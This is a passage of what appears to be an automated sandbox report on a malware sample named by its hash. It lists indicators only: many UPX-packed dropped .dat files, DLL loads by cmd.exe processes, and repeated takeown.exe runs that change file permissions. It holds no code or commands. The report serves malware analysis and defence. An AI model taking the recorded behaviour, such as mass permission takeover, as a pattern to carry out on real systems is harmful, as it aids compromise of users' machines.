behavioral1/files/0x00030000000131ba-814.dat upx behavioral1/files/0x00030000000131ba-816.dat upx behavioral1/files/0x00030000000131ba-821.dat upx behavioral1/files/0x00030000000131ba-823.dat upx behavioral1/files/0x00030000000131ba-824.dat upx behavioral1/files/0x00030000000131ba-826.dat upx behavioral1/files/0x00030000000131ba-831.dat upx behavioral1/files/0x00030000000131ba-833.dat upx behavioral1/files/0x00030000000131ba-834.dat upx behavioral1/files/0x00030000000131ba-836.dat upx behavioral1/files/0x00030000000131ba-841.dat upx behavioral1/files/0x00030000000131ba-843.dat upx behavioral1/files/0x00030000000131ba-844.dat upx behavioral1/files/0x00030000000131ba-846.dat upx behavioral1/files/0x00030000000131ba-851.dat upx behavioral1/files/0x00030000000131ba-853.dat upx behavioral1/files/0x00030000000131ba-854.dat upx behavioral1/files/0x00030000000131ba-856.dat upx behavioral1/files/0x00030000000131ba-861.dat upx behavioral1/files/0x00030000000131ba-863.dat upx behavioral1/files/0x00030000000131ba-864.dat upx behavioral1/files/0x00030000000131ba-866.dat upx behavioral1/files/0x00030000000131ba-871.dat upx behavioral1/files/0x00030000000131ba-873.dat upx behavioral1/files/0x00030000000131ba-874.dat upx behavioral1/files/0x00030000000131ba-876.dat upx behavioral1/files/0x00030000000131ba-881.dat upx behavioral1/files/0x00030000000131ba-883.dat upx behavioral1/files/0x00030000000131ba-884.dat upx behavioral1/files/0x00030000000131ba-886.dat upx behavioral1/files/0x00030000000131ba-891.dat upx behavioral1/files/0x00030000000131ba-893.dat upx behavioral1/files/0x00030000000131ba-894.dat upx behavioral1/files/0x00030000000131ba-896.dat upx behavioral1/files/0x00030000000131ba-901.dat upx behavioral1/files/0x00030000000131ba-903.dat upx behavioral1/files/0x00030000000131ba-904.dat upx behavioral1/files/0x00030000000131ba-906.dat upx behavioral1/files/0x00030000000131ba-911.dat upx behavioral1/files/0x00030000000131ba-913.dat upx behavioral1/files/0x00030000000131ba-914.dat upx behavioral1/files/0x00030000000131ba-916.dat upx behavioral1/files/0x00030000000131ba-921.dat upx behavioral1/files/0x00030000000131ba-923.dat upx behavioral1/files/0x00030000000131ba-924.dat upx behavioral1/files/0x00030000000131ba-926.dat upx behavioral1/files/0x00030000000131ba-931.dat upx behavioral1/files/0x00030000000131ba-933.dat upx behavioral1/files/0x00030000000131ba-934.dat upx behavioral1/files/0x00030000000131ba-936.dat upx behavioral1/files/0x00030000000131ba-941.dat upx behavioral1/files/0x00030000000131ba-943.dat upx behavioral1/files/0x00030000000131ba-944.dat upx behavioral1/files/0x00030000000131ba-946.dat upx behavioral1/files/0x00030000000131ba-951.dat upx behavioral1/files/0x00030000000131ba-953.dat upx behavioral1/files/0x00030000000131ba-954.dat upx behavioral1/files/0x00030000000131ba-956.dat upx behavioral1/files/0x00030000000131ba-961.dat upx behavioral1/files/0x00030000000131ba-963.dat upx behavioral1/files/0x00030000000131ba-964.dat upx behavioral1/files/0x00030000000131ba-966.dat upx behavioral1/files/0x00030000000131ba-971.dat upx behavioral1/files/0x00030000000131ba-973.dat upx behavioral1/files/0x00030000000131ba-974.dat upx behavioral1/files/0x00030000000131ba-976.dat upx behavioral1/files/0x00030000000131ba-981.dat upx behavioral1/files/0x00030000000131ba-983.dat upx behavioral1/files/0x00030000000131ba-984.dat upx behavioral1/files/0x00030000000131ba-986.dat upx behavioral1/files/0x00030000000131ba-991.dat upx behavioral1/files/0x00030000000131ba-993.dat upx behavioral1/files/0x00030000000131ba-994.dat upx behavioral1/files/0x00030000000131ba-996.dat upx behavioral1/files/0x00030000000131ba-1001.dat upx behavioral1/files/0x00030000000131ba-1003.dat upx behavioral1/files/0x00030000000131ba-1004.dat upx behavioral1/files/0x00030000000131ba-1006.dat upx behavioral1/files/0x00030000000131ba-1011.dat upx behavioral1/files/0x00030000000131ba-1013.dat upx behavioral1/files/0x00030000000131ba-1014.dat upx behavioral1/files/0x00030000000131ba-1016.dat upx behavioral1/files/0x00030000000131ba-1021.dat upx behavioral1/files/0x00030000000131ba-1023.dat upx behavioral1/files/0x00030000000131ba-1024.dat upx behavioral1/files/0x00030000000131ba-1026.dat upx behavioral1/files/0x00030000000131ba-1031.dat upx behavioral1/files/0x00030000000131ba-1033.dat upx behavioral1/files/0x00030000000131ba-1034.dat upx behavioral1/files/0x00030000000131ba-1036.dat upx behavioral1/files/0x00030000000131ba-1041.dat upx behavioral1/files/0x00030000000131ba-1043.dat upx behavioral1/files/0x00030000000131ba-1044.dat upx behavioral1/files/0x00030000000131ba-1046.dat upx behavioral1/files/0x00030000000131ba-1051.dat upx behavioral1/files/0x00030000000131ba-1053.dat upx behavioral1/files/0x00030000000131ba-1054.dat upx behavioral1/files/0x00030000000131ba-1056.dat upx behavioral1/files/0x00030000000131ba-1061.dat upx behavioral1/files/0x00030000000131ba-1063.dat upx behavioral1/files/0x00030000000131ba-1064.dat upx behavioral1/files/0x00030000000131ba-1066.dat upx behavioral1/files/0x00030000000131ba-1071.dat upx behavioral1/files/0x00030000000131ba-1073.dat upx behavioral1/files/0x00030000000131ba-1074.dat upx behavioral1/files/0x00030000000131ba-1076.dat upx behavioral1/files/0x00030000000131ba-1081.dat upx behavioral1/files/0x00030000000131ba-1083.dat upx behavioral1/files/0x00030000000131ba-1084.dat upx behavioral1/files/0x00030000000131ba-1086.dat upx behavioral1/files/0x00030000000131ba-1091.dat upx behavioral1/files/0x00030000000131ba-1093.dat upx behavioral1/files/0x00030000000131ba-1094.dat upx behavioral1/files/0x00030000000131ba-1096.dat upx behavioral1/files/0x00030000000131ba-1101.dat upx behavioral1/files/0x00030000000131ba-1103.dat upx behavioral1/files/0x00030000000131ba-1104.dat upx behavioral1/files/0x00030000000131ba-1106.dat upx behavioral1/files/0x00030000000131ba-1111.dat upx behavioral1/files/0x00030000000131ba-1113.dat upx behavioral1/files/0x00030000000131ba-1114.dat upx behavioral1/files/0x00030000000131ba-1116.dat upx behavioral1/files/0x00030000000131ba-1121.dat upx behavioral1/files/0x00030000000131ba-1123.dat upx behavioral1/files/0x00030000000131ba-1124.dat upx behavioral1/files/0x00030000000131ba-1126.dat upx behavioral1/files/0x00030000000131ba-1131.dat upx behavioral1/files/0x00030000000131ba-1133.dat upx behavioral1/files/0x00030000000131ba-1134.dat upx behavioral1/files/0x00030000000131ba-1136.dat upx behavioral1/files/0x00030000000131ba-1141.dat upx behavioral1/files/0x00030000000131ba-1143.dat upx behavioral1/files/0x00030000000131ba-1144.dat upx behavioral1/files/0x00030000000131ba-1146.dat upx behavioral1/files/0x00030000000131ba-1151.dat upx behavioral1/files/0x00030000000131ba-1153.dat upx behavioral1/files/0x00030000000131ba-1154.dat upx behavioral1/files/0x00030000000131ba-1156.dat upx behavioral1/files/0x00030000000131ba-1161.dat upx behavioral1/files/0x00030000000131ba-1163.dat upx behavioral1/files/0x00030000000131ba-1164.dat upx behavioral1/files/0x00030000000131ba-1166.dat upx behavioral1/files/0x00030000000131ba-1171.dat upx behavioral1/files/0x00030000000131ba-1173.dat upx behavioral1/files/0x00030000000131ba-1174.dat upx behavioral1/files/0x00030000000131ba-1176.dat upx behavioral1/files/0x00030000000131ba-1181.dat upx behavioral1/files/0x00030000000131ba-1183.dat upx behavioral1/files/0x00030000000131ba-1184.dat upx behavioral1/files/0x00030000000131ba-1186.dat upx behavioral1/files/0x00030000000131ba-1191.dat upx behavioral1/files/0x00030000000131ba-1193.dat upx behavioral1/files/0x00030000000131ba-1194.dat upx behavioral1/files/0x00030000000131ba-1196.dat upx behavioral1/files/0x00030000000131ba-1201.dat upx behavioral1/files/0x00030000000131ba-1203.dat upx behavioral1/files/0x00030000000131ba-1204.dat upx behavioral1/files/0x00030000000131ba-1206.dat upx behavioral1/files/0x00030000000131ba-1211.dat upx behavioral1/files/0x00030000000131ba-1213.dat upx behavioral1/files/0x00030000000131ba-1214.dat upx behavioral1/files/0x00030000000131ba-1216.dat upx behavioral1/files/0x00030000000131ba-1221.dat upx behavioral1/files/0x00030000000131ba-1223.dat upx behavioral1/files/0x00030000000131ba-1224.dat upx behavioral1/files/0x00030000000131ba-1226.dat upx behavioral1/files/0x00030000000131ba-1231.dat upx behavioral1/files/0x00030000000131ba-1233.dat upx behavioral1/files/0x00030000000131ba-1234.dat upx behavioral1/files/0x00030000000131ba-1236.dat upx behavioral1/files/0x00030000000131ba-1241.dat upx behavioral1/files/0x00030000000131ba-1243.dat upx behavioral1/files/0x00030000000131ba-1244.dat upx behavioral1/files/0x00030000000131ba-1246.dat upx behavioral1/files/0x00030000000131ba-1251.dat upx behavioral1/files/0x00030000000131ba-1253.dat upx behavioral1/files/0x00030000000131ba-1254.dat upx behavioral1/files/0x00030000000131ba-1256.dat upx behavioral1/files/0x00030000000131ba-1261.dat upx behavioral1/files/0x00030000000131ba-1263.dat upx behavioral1/files/0x00030000000131ba-1264.dat upx behavioral1/files/0x00030000000131ba-1266.dat upx behavioral1/files/0x00030000000131ba-1271.dat upx behavioral1/files/0x00030000000131ba-1273.dat upx behavioral1/files/0x00030000000131ba-1274.dat upx behavioral1/files/0x00030000000131ba-1276.dat upx behavioral1/files/0x00030000000131ba-1281.dat upx behavioral1/files/0x00030000000131ba-1283.dat upx behavioral1/files/0x00030000000131ba-1284.dat upx behavioral1/files/0x00030000000131ba-1286.dat upx behavioral1/files/0x00030000000131ba-1291.dat upx behavioral1/files/0x00030000000131ba-1293.dat upx behavioral1/files/0x00030000000131ba-1294.dat upx behavioral1/files/0x00030000000131ba-1296.dat upx behavioral1/files/0x00030000000131ba-1301.dat upx behavioral1/files/0x00030000000131ba-1303.dat upx behavioral1/files/0x00030000000131ba-1304.dat upx behavioral1/files/0x00030000000131ba-1306.dat upx behavioral1/files/0x00030000000131ba-1311.dat upx behavioral1/files/0x00030000000131ba-1313.dat upx behavioral1/files/0x00030000000131ba-1314.dat upx behavioral1/files/0x00030000000131ba-1316.dat upx behavioral1/files/0x00030000000131ba-1321.dat upx behavioral1/files/0x00030000000131ba-1323.dat upx behavioral1/files/0x00030000000131ba-1324.dat upx behavioral1/files/0x00030000000131ba-1326.dat upx behavioral1/files/0x00030000000131ba-1331.dat upx behavioral1/files/0x00030000000131ba-1333.dat upx behavioral1/files/0x00030000000131ba-1334.dat upx behavioral1/files/0x00030000000131ba-1336.dat upx behavioral1/files/0x00030000000131ba-1341.dat upx behavioral1/files/0x00030000000131ba-1343.dat upx behavioral1/files/0x00030000000131ba-1344.dat upx behavioral1/files/0x00030000000131ba-1346.dat upx behavioral1/files/0x00030000000131ba-1351.dat upx behavioral1/files/0x00030000000131ba-1353.dat upx behavioral1/files/0x00030000000131ba-1354.dat upx behavioral1/files/0x00030000000131ba-1356.dat upx behavioral1/files/0x00030000000131ba-1361.dat upx behavioral1/files/0x00030000000131ba-1363.dat upx behavioral1/files/0x00030000000131ba-1364.dat upx behavioral1/files/0x00030000000131ba-1366.dat upx behavioral1/files/0x00030000000131ba-1371.dat upx behavioral1/files/0x00030000000131ba-1373.dat upx behavioral1/files/0x00030000000131ba-1374.dat upx behavioral1/files/0x00030000000131ba-1376.dat upx behavioral1/files/0x00030000000131ba-1381.dat upx behavioral1/files/0x00030000000131ba-1383.dat upx behavioral1/files/0x00030000000131ba-1384.dat upx behavioral1/files/0x00030000000131ba-1386.dat upx behavioral1/files/0x00030000000131ba-1391.dat upx behavioral1/files/0x00030000000131ba-1393.dat upx behavioral1/files/0x00030000000131ba-1394.dat upx behavioral1/files/0x00030000000131ba-1396.dat upx behavioral1/files/0x00030000000131ba-1401.dat upx behavioral1/files/0x00030000000131ba-1403.dat upx behavioral1/files/0x00030000000131ba-1404.dat upx behavioral1/files/0x00030000000131ba-1406.dat upx behavioral1/files/0x00030000000131ba-1411.dat upx behavioral1/files/0x00030000000131ba-1413.dat upx behavioral1/files/0x00030000000131ba-1414.dat upx behavioral1/files/0x00030000000131ba-1416.dat upx behavioral1/files/0x00030000000131ba-1421.dat upx behavioral1/files/0x00030000000131ba-1423.dat upx behavioral1/files/0x00030000000131ba-1424.dat upx behavioral1/files/0x00030000000131ba-1426.dat upx behavioral1/files/0x00030000000131ba-1431.dat upx behavioral1/files/0x00030000000131ba-1433.dat upx behavioral1/files/0x00030000000131ba-1434.dat upx behavioral1/files/0x00030000000131ba-1436.dat upx behavioral1/files/0x00030000000131ba-1441.dat upx behavioral1/files/0x00030000000131ba-1443.dat upx behavioral1/files/0x00030000000131ba-1444.dat upx behavioral1/files/0x00030000000131ba-1446.dat upx behavioral1/files/0x00030000000131ba-1451.dat upx behavioral1/files/0x00030000000131ba-1453.dat upx behavioral1/files/0x00030000000131ba-1454.dat upx behavioral1/files/0x00030000000131ba-1456.dat upx behavioral1/files/0x00030000000131ba-1461.dat upx behavioral1/files/0x00030000000131ba-1463.dat upx behavioral1/files/0x00030000000131ba-1464.dat upx behavioral1/files/0x00030000000131ba-1466.dat upx behavioral1/files/0x00030000000131ba-1471.dat upx behavioral1/files/0x00030000000131ba-1473.dat upx behavioral1/files/0x00030000000131ba-1474.dat upx behavioral1/files/0x00030000000131ba-1476.dat upx behavioral1/files/0x00030000000131ba-1481.dat upx behavioral1/files/0x00030000000131ba-1483.dat upx behavioral1/files/0x00030000000131ba-1484.dat upx behavioral1/files/0x00030000000131ba-1486.dat upx behavioral1/files/0x00030000000131ba-1491.dat upx behavioral1/files/0x00030000000131ba-1493.dat upx behavioral1/files/0x00030000000131ba-1494.dat upx behavioral1/files/0x00030000000131ba-1496.dat upx behavioral1/files/0x00030000000131ba-1501.dat upx behavioral1/files/0x00030000000131ba-1503.dat upx behavioral1/files/0x00030000000131ba-1504.dat upx behavioral1/files/0x00030000000131ba-1506.dat upx behavioral1/files/0x00030000000131ba-1511.dat upx behavioral1/files/0x00030000000131ba-1513.dat upx behavioral1/files/0x00030000000131ba-1514.dat upx behavioral1/files/0x00030000000131ba-1516.dat upx behavioral1/files/0x00030000000131ba-1521.dat upx behavioral1/files/0x00030000000131ba-1523.dat upx behavioral1/files/0x00030000000131ba-1524.dat upx behavioral1/files/0x00030000000131ba-1526.dat upx behavioral1/files/0x00030000000131ba-1531.dat upx behavioral1/files/0x00030000000131ba-1533.dat upx behavioral1/files/0x00030000000131ba-1534.dat upx behavioral1/files/0x00030000000131ba-1536.dat upx behavioral1/files/0x00030000000131ba-1541.dat upx behavioral1/files/0x00030000000131ba-1543.dat upx behavioral1/files/0x00030000000131ba-1544.dat upx behavioral1/files/0x00030000000131ba-1546.dat upx behavioral1/files/0x00030000000131ba-1551.dat upx behavioral1/files/0x00030000000131ba-1553.dat upx behavioral1/files/0x00030000000131ba-1554.dat upx behavioral1/files/0x00030000000131ba-1556.dat upx behavioral1/files/0x00030000000131ba-1561.dat upx behavioral1/files/0x00030000000131ba-1563.dat upx behavioral1/files/0x00030000000131ba-1564.dat upx behavioral1/files/0x00030000000131ba-1566.dat upx behavioral1/files/0x00030000000131ba-1571.dat upx behavioral1/files/0x00030000000131ba-1573.dat upx behavioral1/files/0x00030000000131ba-1574.dat upx behavioral1/files/0x00030000000131ba-1576.dat upx behavioral1/files/0x00030000000131ba-1581.dat upx behavioral1/files/0x00030000000131ba-1583.dat upx behavioral1/files/0x00030000000131ba-1584.dat upx behavioral1/files/0x00030000000131ba-1586.dat upx behavioral1/files/0x00030000000131ba-1591.dat upx behavioral1/files/0x00030000000131ba-1593.dat upx behavioral1/files/0x00030000000131ba-1594.dat upx behavioral1/files/0x00030000000131ba-1596.dat upx behavioral1/files/0x00030000000131ba-1601.dat upx behavioral1/files/0x00030000000131ba-1603.dat upx behavioral1/files/0x00030000000131ba-1604.dat upx behavioral1/files/0x00030000000131ba-1606.dat upx behavioral1/files/0x00030000000131ba-1611.dat upx behavioral1/files/0x00030000000131ba-1613.dat upx behavioral1/files/0x00030000000131ba-1614.dat upx behavioral1/files/0x00030000000131ba-1616.dat upx behavioral1/files/0x00030000000131ba-1621.dat upx behavioral1/files/0x00030000000131ba-1623.dat upx behavioral1/files/0x00030000000131ba-1624.dat upx behavioral1/files/0x00030000000131ba-1626.dat upx behavioral1/files/0x00030000000131ba-1631.dat upx behavioral1/files/0x00030000000131ba-1633.dat upx behavioral1/files/0x00030000000131ba-1634.dat upx behavioral1/files/0x00030000000131ba-1636.dat upx behavioral1/files/0x00030000000131ba-1641.dat upx behavioral1/files/0x00030000000131ba-1643.dat upx behavioral1/files/0x00030000000131ba-1644.dat upx behavioral1/files/0x00030000000131ba-1646.dat upx behavioral1/files/0x00030000000131ba-1651.dat upx behavioral1/files/0x00030000000131ba-1653.dat upx behavioral1/files/0x00030000000131ba-1654.dat upx behavioral1/files/0x00030000000131ba-1656.dat upx behavioral1/files/0x00030000000131ba-1661.dat upx behavioral1/files/0x00030000000131ba-1663.dat upx behavioral1/files/0x00030000000131ba-1664.dat upx behavioral1/files/0x00030000000131ba-1666.dat upx behavioral1/files/0x00030000000131ba-1671.dat upx behavioral1/files/0x00030000000131ba-1673.dat upx behavioral1/files/0x00030000000131ba-1674.dat upx behavioral1/files/0x00030000000131ba-1676.dat upx behavioral1/files/0x00030000000131ba-1681.dat upx behavioral1/files/0x00030000000131ba-1683.dat upx behavioral1/files/0x00030000000131ba-1684.dat upx behavioral1/files/0x00030000000131ba-1686.dat upx behavioral1/files/0x00030000000131ba-1691.dat upx behavioral1/files/0x00030000000131ba-1693.dat upx behavioral1/files/0x00030000000131ba-1694.dat upx behavioral1/files/0x00030000000131ba-1696.dat upx behavioral1/files/0x00030000000131ba-1701.dat upx behavioral1/files/0x00030000000131ba-1703.dat upx behavioral1/files/0x00030000000131ba-1704.dat upx behavioral1/files/0x00030000000131ba-1706.dat upx behavioral1/files/0x00030000000131ba-1711.dat upx behavioral1/files/0x00030000000131ba-1713.dat upx behavioral1/files/0x00030000000131ba-1714.dat upx behavioral1/files/0x00030000000131ba-1716.dat upx behavioral1/files/0x00030000000131ba-1721.dat upx behavioral1/files/0x00030000000131ba-1723.dat upx behavioral1/files/0x00030000000131ba-1724.dat upx behavioral1/files/0x00030000000131ba-1726.dat upx behavioral1/files/0x00030000000131ba-1731.dat upx behavioral1/files/0x00030000000131ba-1733.dat upx behavioral1/files/0x00030000000131ba-1734.dat upx behavioral1/files/0x00030000000131ba-1736.dat upx behavioral1/files/0x00030000000131ba-1741.dat upx behavioral1/files/0x00030000000131ba-1743.dat upx behavioral1/files/0x00030000000131ba-1744.dat upx behavioral1/files/0x00030000000131ba-1746.dat upx behavioral1/files/0x00030000000131ba-1751.dat upx behavioral1/files/0x00030000000131ba-1753.dat upx behavioral1/files/0x00030000000131ba-1754.dat upx behavioral1/files/0x00030000000131ba-1756.dat upx behavioral1/files/0x00030000000131ba-1761.dat upx behavioral1/files/0x00030000000131ba-1763.dat upx behavioral1/files/0x00030000000131ba-1764.dat upx behavioral1/files/0x00030000000131ba-1766.dat upx behavioral1/files/0x00030000000131ba-1771.dat upx behavioral1/files/0x00030000000131ba-1773.dat upx behavioral1/files/0x00030000000131ba-1774.dat upx behavioral1/files/0x00030000000131ba-1776.dat upx behavioral1/files/0x00030000000131ba-1781.dat upx behavioral1/files/0x00030000000131ba-1783.dat upx behavioral1/files/0x00030000000131ba-1784.dat upx behavioral1/files/0x00030000000131ba-1786.dat upx behavioral1/files/0x00030000000131ba-1791.dat upx behavioral1/files/0x00030000000131ba-1793.dat upx behavioral1/files/0x00030000000131ba-1794.dat upx behavioral1/files/0x00030000000131ba-1796.dat upx behavioral1/files/0x00030000000131ba-1801.dat upx behavioral1/files/0x00030000000131ba-1803.dat upx behavioral1/files/0x00030000000131ba-1804.dat upx behavioral1/files/0x00030000000131ba-1806.dat upx behavioral1/files/0x00030000000131ba-1811.dat upx behavioral1/files/0x00030000000131ba-1813.dat upx behavioral1/files/0x00030000000131ba-1814.dat upx behavioral1/files/0x00030000000131ba-1816.dat upx -
Loads dropped DLL 360 IoCs
pid Process 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1356 cmd.exe 928 RzKn8STp.exe 1220 cmd.exe 792 cmd.exe 860 cmd.exe 1940 cmd.exe 2036 cmd.exe 1784 cmd.exe 1964 cmd.exe 972 cmd.exe 1068 cmd.exe 2032 cmd.exe 1868 cmd.exe 680 cmd.exe 1808 cmd.exe 564 cmd.exe 1556 cmd.exe 1956 cmd.exe 1408 cmd.exe 1868 cmd.exe 1944 cmd.exe 1032 cmd.exe 1796 cmd.exe 1644 cmd.exe 1092 cmd.exe 2036 cmd.exe 1640 cmd.exe 972 cmd.exe 796 cmd.exe 1232 cmd.exe 2012 cmd.exe 1824 cmd.exe 1832 cmd.exe 1032 cmd.exe 472 cmd.exe 1944 cmd.exe 1136 cmd.exe 796 cmd.exe 1640 cmd.exe 1092 cmd.exe 436 cmd.exe 1808 cmd.exe 220 cmd.exe 796 cmd.exe 1680 cmd.exe 1684 cmd.exe 920 cmd.exe 1228 cmd.exe 1680 cmd.exe 1120 cmd.exe 680 cmd.exe 208 cmd.exe 908 cmd.exe 972 cmd.exe 624 cmd.exe 1944 cmd.exe 1824 cmd.exe 1956 cmd.exe 1584 cmd.exe 1340 cmd.exe 920 cmd.exe 1936 cmd.exe 1808 cmd.exe 548 cmd.exe 1680 cmd.exe 1828 cmd.exe 472 cmd.exe 1216 cmd.exe 1488 cmd.exe 232 cmd.exe 1152 cmd.exe 1176 cmd.exe 1980 cmd.exe 1948 cmd.exe 1460 cmd.exe 1956 cmd.exe 1516 cmd.exe 360 cmd.exe 1228 cmd.exe 1844 cmd.exe 796 cmd.exe 228 cmd.exe 224 cmd.exe 952 cmd.exe 1076 cmd.exe 624 cmd.exe 1680 cmd.exe 888 cmd.exe 1556 cmd.exe 1492 cmd.exe 1824 cmd.exe 680 cmd.exe 1584 cmd.exe 1332 cmd.exe 1776 cmd.exe 1828 cmd.exe 1784 cmd.exe 1808 cmd.exe 224 cmd.exe 1152 cmd.exe 672 cmd.exe 952 cmd.exe 228 cmd.exe 1980 cmd.exe 1256 cmd.exe 888 cmd.exe 672 cmd.exe 660 cmd.exe 228 cmd.exe 1796 cmd.exe 1120 cmd.exe 972 cmd.exe 1948 cmd.exe 528 cmd.exe 228 cmd.exe 1960 cmd.exe 908 cmd.exe 1684 cmd.exe 360 cmd.exe 948 cmd.exe 1784 cmd.exe 232 cmd.exe 624 cmd.exe 1936 cmd.exe 976 cmd.exe 472 cmd.exe 1152 cmd.exe 680 cmd.exe 1492 cmd.exe 220 cmd.exe 1584 cmd.exe 1776 cmd.exe 1168 cmd.exe 1960 cmd.exe 1948 cmd.exe 1020 cmd.exe 1216 cmd.exe 948 cmd.exe 1684 cmd.exe 1060 cmd.exe 360 cmd.exe 1408 cmd.exe 1796 cmd.exe 964 cmd.exe 624 cmd.exe 680 cmd.exe 1136 cmd.exe 1332 cmd.exe 1756 cmd.exe 1776 cmd.exe 908 cmd.exe 2032 cmd.exe 1964 cmd.exe 1560 cmd.exe 1472 cmd.exe 672 cmd.exe 920 cmd.exe 1120 cmd.exe 688 cmd.exe 1584 cmd.exe 1232 cmd.exe 1960 cmd.exe 1408 cmd.exe 952 cmd.exe 228 cmd.exe 1332 cmd.exe 1176 cmd.exe 1776 cmd.exe 1468 cmd.exe 1516 cmd.exe 1432 cmd.exe 360 cmd.exe 1020 cmd.exe 624 cmd.exe 948 cmd.exe 1492 cmd.exe 1060 cmd.exe 1948 cmd.exe 1076 cmd.exe 1556 cmd.exe 1088 cmd.exe 1828 cmd.exe 1824 cmd.exe 1584 cmd.exe 1120 cmd.exe 1684 cmd.exe 1996 cmd.exe 976 cmd.exe 228 cmd.exe 1956 cmd.exe 952 cmd.exe 368 cmd.exe 1936 cmd.exe 1088 cmd.exe 232 cmd.exe 1680 cmd.exe 680 cmd.exe 1488 cmd.exe 472 cmd.exe 1868 cmd.exe 884 cmd.exe 1796 cmd.exe 1832 cmd.exe 1176 cmd.exe 1776 cmd.exe 1188 cmd.exe 1256 cmd.exe 1956 cmd.exe 528 cmd.exe 1492 cmd.exe 964 cmd.exe 1136 cmd.exe 1944 cmd.exe 1212 cmd.exe 1936 cmd.exe 1488 cmd.exe 224 cmd.exe 920 cmd.exe 680 cmd.exe 1796 cmd.exe 1340 cmd.exe 1996 cmd.exe 1680 cmd.exe 1756 cmd.exe 1112 cmd.exe 1216 cmd.exe 908 cmd.exe 948 cmd.exe 660 cmd.exe 888 cmd.exe 1332 cmd.exe 1832 cmd.exe 1560 cmd.exe 624 cmd.exe 2040 cmd.exe 228 cmd.exe 1340 cmd.exe 1492 cmd.exe 1956 cmd.exe 1460 cmd.exe 1060 cmd.exe 964 cmd.exe 1996 cmd.exe 976 cmd.exe 1088 cmd.exe 1584 cmd.exe 1748 cmd.exe 472 cmd.exe 2032 cmd.exe 548 cmd.exe 1776 cmd.exe 1980 cmd.exe 1832 cmd.exe 1944 cmd.exe 1868 cmd.exe 1408 cmd.exe 1776 cmd.exe 1476 cmd.exe 1832 cmd.exe 224 cmd.exe 1168 cmd.exe 1828 cmd.exe 1684 cmd.exe 1460 cmd.exe 964 cmd.exe 1088 cmd.exe 908 cmd.exe 1748 cmd.exe 660 cmd.exe 1828 cmd.exe 1020 cmd.exe 1200 cmd.exe 1168 cmd.exe 1948 cmd.exe 796 cmd.exe 548 cmd.exe 1996 cmd.exe 624 cmd.exe 856 cmd.exe 1784 cmd.exe 1684 cmd.exe 1432 cmd.exe 964 cmd.exe 1488 cmd.exe 360 cmd.exe 888 cmd.exe 1216 cmd.exe 1332 cmd.exe 1832 cmd.exe 2036 cmd.exe 836 cmd.exe 1828 cmd.exe 660 cmd.exe 1936 cmd.exe 1020 cmd.exe 1332 cmd.exe 360 cmd.exe 2036 cmd.exe 368 cmd.exe 624 cmd.exe 1832 cmd.exe 1936 cmd.exe 836 cmd.exe 1332 cmd.exe 1980 cmd.exe 1964 cmd.exe 1556 cmd.exe 1584 cmd.exe 1472 cmd.exe 688 cmd.exe 1216 cmd.exe 1120 cmd.exe 964 cmd.exe 1756 cmd.exe 1176 cmd.exe 1944 cmd.exe 1744 cmd.exe 836 cmd.exe 220 cmd.exe 472 cmd.exe 1188 cmd.exe 1556 cmd.exe 884 cmd.exe 1472 cmd.exe 888 cmd.exe 1216 cmd.exe 1788 cmd.exe 1488 cmd.exe 528 cmd.exe 1176 cmd.exe 1152 cmd.exe 1200 cmd.exe 1956 cmd.exe 1832 cmd.exe 1960 cmd.exe 1828 cmd.exe 224 cmd.exe 1864 cmd.exe 2036 cmd.exe 888 cmd.exe 1984 cmd.exe 1788 cmd.exe 1936 cmd.exe 528 cmd.exe 472 cmd.exe 1152 cmd.exe 1412 cmd.exe 232 cmd.exe 320 cmd.exe 1256 cmd.exe 1440 cmd.exe 1468 cmd.exe 1476 cmd.exe 860 cmd.exe 1748 cmd.exe 1460 cmd.exe 1168 cmd.exe 1948 cmd.exe -
Modifies file permissions 1 TTPs 179 IoCs
pid Process 884 takeown.exe 1796 takeown.exe 860 takeown.exe 1472 takeown.exe 1188 takeown.exe 1960 takeown.exe 1868 takeown.exe 1120 takeown.exe 1120 takeown.exe 1112 takeown.exe 1468 takeown.exe 796 takeown.exe 1680 takeown.exe 1560 takeown.exe 1844 takeown.exe 564 takeown.exe 1468 takeown.exe 1796 takeown.exe 232 takeown.exe 972 takeown.exe 1216 takeown.exe 688 takeown.exe 2012 takeown.exe 2040 takeown.exe 1168 takeown.exe 220 takeown.exe 1432 takeown.exe 1136 takeown.exe 672 takeown.exe 1560 takeown.exe 908 takeown.exe 564 takeown.exe 908 takeown.exe 1936 takeown.exe 1168 takeown.exe 1808 takeown.exe 564 takeown.exe 1744 takeown.exe 1028 takeown.exe 1868 takeown.exe 1776 takeown.exe 908 takeown.exe 1152 takeown.exe 1944 takeown.exe 1488 takeown.exe 1796 takeown.exe 1152 takeown.exe 1232 takeown.exe 1808 takeown.exe 832 takeown.exe 1516 takeown.exe 228 takeown.exe 1152 takeown.exe 1228 takeown.exe 1556 takeown.exe 228 takeown.exe 564 takeown.exe 1960 takeown.exe 1020 takeown.exe 1412 takeown.exe 1076 takeown.exe 2032 takeown.exe 1956 takeown.exe 1232 takeown.exe 1828 takeown.exe 952 takeown.exe 1776 takeown.exe 660 takeown.exe 2040 takeown.exe 908 takeown.exe 1808 takeown.exe 1472 takeown.exe 1868 takeown.exe 920 takeown.exe 972 takeown.exe 1260 takeown.exe 1120 takeown.exe 1332 takeown.exe 1152 takeown.exe 1152 takeown.exe 972 takeown.exe 1996 takeown.exe 1784 takeown.exe 1472 takeown.exe 2040 takeown.exe 1216 takeown.exe 1808 takeown.exe 1960 takeown.exe 1584 takeown.exe 952 takeown.exe 1560 takeown.exe 1256 takeown.exe 1784 takeown.exe 1584 takeown.exe 1996 takeown.exe 228 takeown.exe 228 takeown.exe 1232 takeown.exe 1332 takeown.exe 1400 takeown.exe 1832 takeown.exe 1232 takeown.exe 888 takeown.exe 856 takeown.exe 1256 takeown.exe 472 takeown.exe 1960 takeown.exe 1576 takeown.exe 1980 takeown.exe 952 takeown.exe 1488 takeown.exe 1784 takeown.exe 1232 takeown.exe 796 takeown.exe 1472 takeown.exe 884 takeown.exe 1136 takeown.exe 1788 takeown.exe 964 takeown.exe 1964 takeown.exe 920 takeown.exe 1212 takeown.exe 1076 takeown.exe 1680 takeown.exe 1468 takeown.exe 1996 takeown.exe 224 takeown.exe 1176 takeown.exe 1788 takeown.exe 232 takeown.exe 1960 takeown.exe 1152 takeown.exe 220 takeown.exe 1576 takeown.exe 680 takeown.exe 1960 takeown.exe 1796 takeown.exe 564 takeown.exe 2024 takeown.exe 1996 takeown.exe 1460 takeown.exe 1944 takeown.exe 1432 takeown.exe 1748 takeown.exe 1468 